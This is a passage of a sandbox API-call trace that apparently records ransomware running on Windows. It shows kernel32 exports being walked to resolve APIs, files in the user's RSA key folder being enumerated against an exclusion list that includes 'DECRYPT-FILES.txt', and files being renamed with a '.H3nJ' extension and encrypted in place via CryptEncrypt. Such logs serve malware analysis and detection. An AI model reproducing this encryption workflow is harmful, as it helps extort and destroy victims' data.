returned="DeleteTimerQueue" [0077.420] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0077.420] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0077.420] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0077.420] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0077.421] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0077.421] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0077.421] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0077.421] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0077.421] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0077.421] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0077.421] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0077.421] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0077.421] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0077.421] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0077.421] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0077.421] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0077.421] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0077.421] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0077.421] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0077.421] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0077.421] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0077.421] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0077.421] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0077.421] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0077.421] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0077.421] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0077.421] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0077.421] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0077.421] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0077.421] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0077.421] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0077.421] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0077.421] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0077.421] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0077.421] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0077.421] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0077.421] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0077.421] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0077.421] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0077.421] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0077.421] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0077.421] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0077.422] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0077.422] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0077.422] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0077.422] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0077.422] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0077.422] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0077.422] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0077.422] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0077.422] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0077.422] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0077.422] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0077.422] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0077.422] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0077.422] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0077.422] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0077.422] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0077.422] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0077.422] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0077.422] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0077.422] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0077.422] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0077.422] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0077.422] lstrcpyW (in: lpString1=0x10d0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0077.422] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-3388679973-3930757225-3770151564-1000\\83aa4cc77f591dfc2374580bbd95f6ba_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f") returned 183 [0077.422] wsprintfW (in: param_1=0x3f2d4b4, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-3388679973-3930757225-3770151564-1000\\83aa4cc77f591dfc2374580bbd95f6ba_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f.H3nJ") returned 188 [0077.422] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-3388679973-3930757225-3770151564-1000\\83aa4cc77f591dfc2374580bbd95f6ba_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\crypto\\rsa\\s-1-5-21-3388679973-3930757225-3770151564-1000\\83aa4cc77f591dfc2374580bbd95f6ba_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-3388679973-3930757225-3770151564-1000\\83aa4cc77f591dfc2374580bbd95f6ba_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f.H3nJ" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\crypto\\rsa\\s-1-5-21-3388679973-3930757225-3770151564-1000\\83aa4cc77f591dfc2374580bbd95f6ba_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f.h3nj"), dwFlags=0x0) returned 1 [0077.423] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0077.423] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0077.423] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0077.424] FindNextFileW (in: hFindFile=0x5f8d58, lpFindFileData=0x3f2e4e4 | out: lpFindFileData=0x3f2e4e4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x681f1360, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x681f1360, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x681f1360, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x57, dwReserved0=0x0, dwReserved1=0x0, cFileName="932a2db58c237abd381d22df4c63a04a_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f", cAlternateFileName="932A2D~1")) returned 1 [0077.424] lstrcmpiW (lpString1="932a2db58c237abd381d22df4c63a04a_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f", lpString2="DECRYPT-FILES.txt") returned -1 [0077.424] lstrcmpiW (lpString1="932a2db58c237abd381d22df4c63a04a_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f", lpString2="autorun.inf") returned -1 [0077.424] lstrcmpiW (lpString1="932a2db58c237abd381d22df4c63a04a_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f", lpString2="boot.ini") returned -1 [0077.424] lstrcmpiW (lpString1="932a2db58c237abd381d22df4c63a04a_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f", lpString2="desktop.ini") returned -1 [0077.424] lstrcmpiW (lpString1="932a2db58c237abd381d22df4c63a04a_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f", lpString2="ntuser.dat") returned -1 [0077.424] lstrcmpiW (lpString1="932a2db58c237abd381d22df4c63a04a_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f", lpString2="iconcache.db") returned -1 [0077.424] lstrcmpiW (lpString1="932a2db58c237abd381d22df4c63a04a_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f", lpString2="bootsect.bak") returned -1 [0077.424] lstrcmpiW (lpString1="932a2db58c237abd381d22df4c63a04a_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f", lpString2="ntuser.dat.log") returned -1 [0077.424] lstrcmpiW (lpString1="932a2db58c237abd381d22df4c63a04a_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f", lpString2="thumbs.db") returned -1 [0077.424] lstrcmpiW (lpString1="932a2db58c237abd381d22df4c63a04a_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f", lpString2="Bootfont.bin") returned -1 [0077.424] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-3388679973-3930757225-3770151564-1000\\") returned 114 [0077.424] lstrlenW (lpString="932a2db58c237abd381d22df4c63a04a_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f") returned 69 [0077.424] lstrcpyW (in: lpString1=0x3f2dcb4, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-3388679973-3930757225-3770151564-1000\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-3388679973-3930757225-3770151564-1000\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-3388679973-3930757225-3770151564-1000\\" [0077.424] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-3388679973-3930757225-3770151564-1000\\", lpString2="932a2db58c237abd381d22df4c63a04a_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-3388679973-3930757225-3770151564-1000\\932a2db58c237abd381d22df4c63a04a_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-3388679973-3930757225-3770151564-1000\\932a2db58c237abd381d22df4c63a04a_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f" [0077.424] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0077.424] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-3388679973-3930757225-3770151564-1000\\932a2db58c237abd381d22df4c63a04a_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\crypto\\rsa\\s-1-5-21-3388679973-3930757225-3770151564-1000\\932a2db58c237abd381d22df4c63a04a_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x460 [0077.425] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x3f2d480 | out: lpFileSize=0x3f2d480*=87) returned 1 [0077.425] CreateFileMappingW (hFile=0x460, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x464 [0077.425] MapViewOfFile (hFileMappingObject=0x464, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xfc0000 [0077.425] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xfb0000 | out: pbBuffer=0xfb0000) returned 1 [0077.425] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xfb0020 | out: pbBuffer=0xfb0020) returned 1 [0077.425] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0077.427] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x10d0000*, pdwDataLen=0x3f2d3e8*=0x28, dwBufLen=0x100 | out: pbData=0x10d0000*, pdwDataLen=0x3f2d3e8*=0x100) returned 1 [0077.427] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0x10e0000 [0077.428] VirtualFree (lpAddress=0x10e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0077.428] UnmapViewOfFile (lpBaseAddress=0xfc0000) returned 1 [0077.428] CloseHandle (hObject=0x464) returned 1 [0077.428] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0077.428] WriteFile (in: hFile=0x460, lpBuffer=0x10d0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2d408, lpOverlapped=0x0 | out: lpBuffer=0x10d0000*, lpNumberOfBytesWritten=0x3f2d408*=0x108, lpOverlapped=0x0) returned 1 [0077.429] CloseHandle (hObject=0x0) returned 0 [0077.429] CloseHandle (hObject=0x460) returned 1 [0077.429] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0077.430] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0077.430] GetTickCount () returned 0x114bdd4 [0077.430] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0077.430] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0077.430] VirtualAlloc (lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0077.431] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0077.431] lstrlenA (lpString="kernel32.dll") returned 12 [0077.431] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0077.431] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0077.431] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0077.431] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0077.431] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0077.431] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0077.431] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0077.431] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0077.431] lstrlenA (lpString="ADDATOMA") returned 8 [0077.431] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0077.431] lstrlenA (lpString="ADDATOMW") returned 8 [0077.431] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0077.431] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0077.431] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0077.431] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0077.431] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0077.431] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0077.431] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0077.431] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0077.431] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0077.431] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0077.431] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0077.432] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0077.432] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0077.432] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0077.432] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0077.432] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0077.432] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0077.432] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0077.432] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0077.432] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0077.432] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0077.432] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0077.432] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0077.432] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0077.432] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0077.432] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0077.432] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0077.432] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0077.432] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0077.432] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0077.432] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0077.432] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0077.432] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0077.432] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0077.432] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0077.432] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0077.432] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0077.432] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0077.432] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0077.432] lstrlenA (lpString="BACKUPREAD") returned 10 [0077.432] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0077.432] lstrlenA (lpString="BACKUPSEEK") returned 10 [0077.432] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0077.432] lstrlenA (lpString="BACKUPWRITE") returned 11 [0077.432] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0077.432] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0077.432] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0077.433] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0077.433] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0077.433] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0077.433] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0077.433] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0077.433] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0077.433] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0077.433] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0077.433] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0077.433] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0077.433] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0077.433] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0077.433] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0077.433] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0077.433] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0077.433] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0077.433] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0077.433] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0077.433] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0077.433] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0077.433] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0077.433] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0077.433] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0077.433] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0077.433] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0077.433] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0077.433] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0077.433] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0077.433] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0077.433] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0077.433] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0077.433] lstrcpyA (in: lpString1=0x3f2c7fc, 